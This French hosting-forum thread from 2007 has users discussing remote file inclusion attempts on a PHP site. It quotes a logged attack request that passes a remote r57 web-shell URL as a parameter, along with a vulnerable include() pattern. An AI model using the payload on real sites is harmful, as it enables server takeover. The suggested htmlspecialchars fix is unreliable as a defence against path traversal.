Forums Webou.net - Hébergement gratuit et sans publicités avec PHP/MySQL Webou Webou Pro
Recherche avancée  
*
Bienvenue, Invité. Veuillez vous connecter ou vous inscrire.
Avez-vous perdu votre courriel d'activation?
19 Novembre 2017, 20:41:28


Connexion avec identifiant, mot de passe et durée de la session


Pages: [1]   Bas de page
  Imprimer  
Auteur Fil de discussion: ..  (Lu 2598 fois)
0 Membres et 1 Invité sur ce fil de discussion.
mifyet
Invité
..
« le: 19 Août 2007, 14:54:03 »

..
« Dernière édition: 09 Octobre 2011, 18:24:31 par mifyet » Journalisée
Forums Webou.net - Hébergement gratuit et sans publicités avec PHP/MySQL
..
« le: 19 Août 2007, 14:54:03 »

 Journalisée
K@cem
Never trust user input
Big boss
*****
Hors ligne Hors ligne

Messages: 2 724



Voir le profil WWW
« Répondre #1 le: 19 Août 2007, 17:24:50 »

apparemment ils veulent inclure leurs pages dans ton site pour qu'ils puissent le pirater ...
J'éspère que c'est sécurisé  Choqué
Ils peuvent faire n'importe quoi si ce n'est aps sécurisé (vider la base de données, supprimer tous tes fichiers, modifier tous le contenu en mettant des adresses pour acheter du viagra ...)

++
Journalisée

Le support ne se fait pas par MP, merci de le respecter !
mifyet
Invité
..
« Répondre #2 le: 20 Août 2007, 13:15:48 »

..
« Dernière édition: 09 Octobre 2011, 18:24:43 par mifyet » Journalisée
K@cem
Never trust user input
Big boss
*****
Hors ligne Hors ligne

Messages: 2 724



Voir le profil WWW
« Répondre #3 le: 20 Août 2007, 13:39:55 »

Il faut donc protéger tes pages ...
Il me semble que je t'avais déjà prévenue dans le passé Sourire

Journalisée

Le support ne se fait pas par MP, merci de le respecter !
mifyet
Invité
..
« Répondre #4 le: 21 Août 2007, 12:07:38 »

..
« Dernière édition: 09 Octobre 2011, 18:24:57 par mifyet » Journalisée
Forums Webou.net - Hébergement gratuit et sans publicités avec PHP/MySQL
..
« Répondre #4 le: 21 Août 2007, 12:07:38 »

 Journalisée
K@cem
Never trust user input
Big boss
*****
Hors ligne Hors ligne

Messages: 2 724



Voir le profil WWW
« Répondre #5 le: 21 Août 2007, 13:43:50 »

Oui j'ai protégé quelques variables ...
Il faut protéger chaque variable avec des fonctions comme htmlspecialchars(), ou mysql_real_escape_string() !
Journalisée

Le support ne se fait pas par MP, merci de le respecter !
eclide
Habitué
**
Hors ligne Hors ligne

Messages: 86


Voir le profil WWW
« Répondre #6 le: 07 Septembre 2007, 10:46:26 »

Bonjour !

Je rebondis sur votre enfilade : dans les statistiques de mon site http://www.eclide.com/, j'ai régulièrement des visites vers une page </php/eclide.php?lang=http://www.evilc0der.com/r57.txt?>, avec un agent : Mozilla/3.0 (compatible; Indy Library).

Pouvez-vous me confirmer qu'il s'agit de tentatives d'attaques, SVP ?

Dans le code de eclide.php, j'utilise les variables ainsi :

Code:
  $lang = $_GET["lang"];
  $page = $_GET["page"];

puis plus loin :

Code:
                  include "page0".$page.$lang.".txt";

... et j'ai bien sûr des fichiers avec des noms du type : "page01fr.txt" ou "page04en.txt"

Il me semble donc être à l'abri de ces attaques (ci c'en sont), puisque je n'ai pas de fichier "page0http://www.evilc0der.com/r57.txt?.txt"

J'ai d'ailleurs essayé d'appeler la page en lien dans les statistiques, et ai obtenu :
Citation
Warning: include(page0http://www.evilc0der.com/r57.txt?.txt) [function.include]: failed to open stream: No such file or directory in /home/eclide/public_html/php/eclide.php on line 24

Warning: include() [function.include]: Failed opening 'page0http://www.evilc0der.com/r57.txt?.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/eclide/public_html/php/eclide.php on line 24

Pouvez-vous me confirmer que je n'ai pas besoin de prendre d'autres mesures pour sécuriser mon site, SVP ?


D'avance merci pour le temps que vous passerez à me lire et à me répondre.

Bonne journée !

Eclide.
Journalisée

Eclide microdécolletage fabrique en série et selon vos plans toute pièce de diamètre inférieur à 4,5 mm.
K@cem
Never trust user input
Big boss
*****
Hors ligne Hors ligne

Messages: 2 724



Voir le profil WWW
« Répondre #7 le: 07 Septembre 2007, 13:42:14 »

Il faut mettre :
Code:
  $lang = htmlspecialchars($_GET["lang"]);
  $page = htmlspecialchars($_GET["page"]);

Et là :
Code:
if(file_exists("page0".$page.$lang.".txt"))
include "page0".$page.$lang.".txt";
else
die("Tentative de hack detecté !!");

++
Journalisée

Le support ne se fait pas par MP, merci de le respecter !
eclide
Habitué
**
Hors ligne Hors ligne

Messages: 86


Voir le profil WWW
« Répondre #8 le: 07 Septembre 2007, 15:19:40 »

Merci pour ton aide, K@cem !

Mise à jour faite dans la version béta qui sera en ligne vers octobre/novembre.   Sourire


Bonne journée !

Eclide.
Journalisée

Eclide microdécolletage fabrique en série et selon vos plans toute pièce de diamètre inférieur à 4,5 mm.
K@cem
Never trust user input
Big boss
*****
Hors ligne Hors ligne

Messages: 2 724



Voir le profil WWW
« Répondre #9 le: 07 Septembre 2007, 16:48:50 »

De rien Sourire
Mais d'ici octobre/novembre qui sait ce que fera ce p'tit pirate, donc vaut mieux commencer par sécuriser dès maintenant  Souriant
Journalisée

Le support ne se fait pas par MP, merci de le respecter !
Pages: [1]   Haut de page
  Imprimer  
 
Aller à:  

Propulsé par MySQL Propulsé par PHP Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Dilber MC Theme by HarzeM
Page générée en 0.022 secondes avec 21 requêtes.